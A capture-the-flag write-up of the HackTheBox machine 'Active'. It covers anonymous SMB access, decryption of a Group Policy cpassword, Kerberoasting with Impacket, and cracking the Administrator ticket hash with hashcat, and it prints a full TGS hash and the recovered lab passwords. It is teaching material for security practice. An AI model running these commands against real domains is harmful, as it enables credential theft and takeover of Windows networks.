Hackthebox Writeup: Active

Output of nmap:

# Nmap 7.94 scan initiated Mon Sep  4 17:39:56 2023 as: /usr/bin/nmap -sCV -p88,135,139,389,445,464,593,636,49152,49153,49154,49155,49157,49158 --open -oN nmap/Script_10.10.10.100.nmap --system-dns --stats-every 2s 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.022s latency).

PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-04 15:40:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-09-04T15:40:56
|_  start_date: 2023-09-04T15:39:38

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep  4 17:40:57 2023 -- 1 IP address (1 host up) scanned in 60.54 seconds

Using enum4linux-ng, we find an SMB share which allows anonymous login:

$ smbclient.py -no-pass 10.10.10.100

While the Users share is not accessible to us, we can access the Replication share.

We see there is a single folder inside the share. We recursively download it using smbclient.

In this directory, we find /Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml, which contains a cpassword field, which can be decrypted easily.

$ python3 gpp-decrypt.py -f ~/htb/active/smb-replication/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

                               __                                __
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/
/___/  /_/    /_/                                /___/  /_/

[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18

With the obtained credentials, we can log in onto SMB as the user, and access the Users share:

smbclient -U "active.htb/SVC_TGS%GPPstillStandingStrong2k18" //10.10.10.100/Users

We pull the entire Users folder recursively, but there is nothing interesting inside.

Kerberoasting

This is a very useful cheat sheet when dealing with Active Directory boxes. You enter what you have (e.g., just username, username and password), the service you want to target, and it tells you what tools you are able to run. With this, I discovered I can start Kerberoasting.

$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2023-09-04 17:40:44.644949



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$dc5d5dea8e316af3a5fbd129d8ea714b$ed52b53f9a90e76d433880b0ecbd829544004f442eda4ffd4097b121a2524dc4415b875a95767049804e0423361f4340992b1d23f547caa05243941954e5fbe8fae62517f0660f64f45059f0047c007b5612a472f8052ab37592f2056fc403b412cb85d34a45c6c2b88f75721bf25ea5867422666a3344890d5806a6a1480079433428454a515eba58f685010dcd8d2814e1553cd79253423b663e41141f9ecc168578651fde917fe1f1c75e57fcfab994593d76915537715f98791a739308055040fd8190df8de908f607719ff386d1958df3138e5c14dc7bd4200fc6ed18b6fe21c61e1f751bee4f9f8e919d3bdda9c60e46ec6dea412b919abd48fb8cf86393cd0cd5b17ba4e03f72dacd9b4182466abcd8bfc98c874594102950f78a7f8330996f1193717ecac946348359309786347544a51fe8aa69e69d5c775b75528a89bab46f90f31e032b88788130306247d981fa8c3b35e8aecea31bf1619134ffffd33e02f9736354aca1531940a451934898576c8f4761b35040e18c669f86db36b518fccb4da24425d73fd1e93e86b6b76d999a40f9d264bb5176e9f842fe4ffdfab8a64beeb767303fcfbc9e5b0c689f8b595c54ba729b89ddb0bcf0e628160d9228be4ec9c54deafc60f4500f62dfb7046bf5c1936840972919d67ee9dae23cfdf6c15e4608acf24c42c682058b6633f47050c4710712404d40291f4f83ffb6c40ba0b2d28428b95c7668d0d0c37194b4cf8555da4b416dd8231d7312334c2159d7fb800dc1de92f15cf35dd4d94627a374109c8b7e30744e524e6d2251597cb22596158e607574a50e6f22e5232c4d86a0e2d7920f29e3b340785b6f8908496f134c0b44679a2f64f5c60e66a204bb3260e6b7e0f2b08b40ff2ca2460fcc67fde4d0ae9a51c591a4c311390effb4850be09ba9e7af8d0df923df2af111f57e353d13bd9ccf2ffe37fc0229b110c38a509864da24a9618bf38ac02c41a3fee8210c88acb82b855fdf13856a049a346bf061892eb98edf2e736d0bbe269e264ea530760e4de3fd35a467fa4224023d289b1fcf9fec8c709a603e89b0c9a0b77d797e66edb43dcd8574a3a47656a82e99e65a71ebf0c68215cce5fc5322b9b76afe3fd176e1f737c2a0f368f9c36e564fcb1fa755f93c89cd45914f23e25fbe6841c8066899a45c05ff9d2bc40a4b89dc6a07cafb5b69af7f05b1945eba2a864ceb40e97f0b72a27d591f12779b38269edf9853cd9198eea3c0

We now have the hash of the Administrator, which we can crack using hashcat:

$ hashcat -m 13100 --attack-mode 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

Turns out the password is Ticketmaster1968. We can now use SMB to get the root flag:

$ smbclient -U "active.htb/Administrator%Ticketmaster1968" //10.10.10.100/Users

Kerberoasting#

Kerberoasting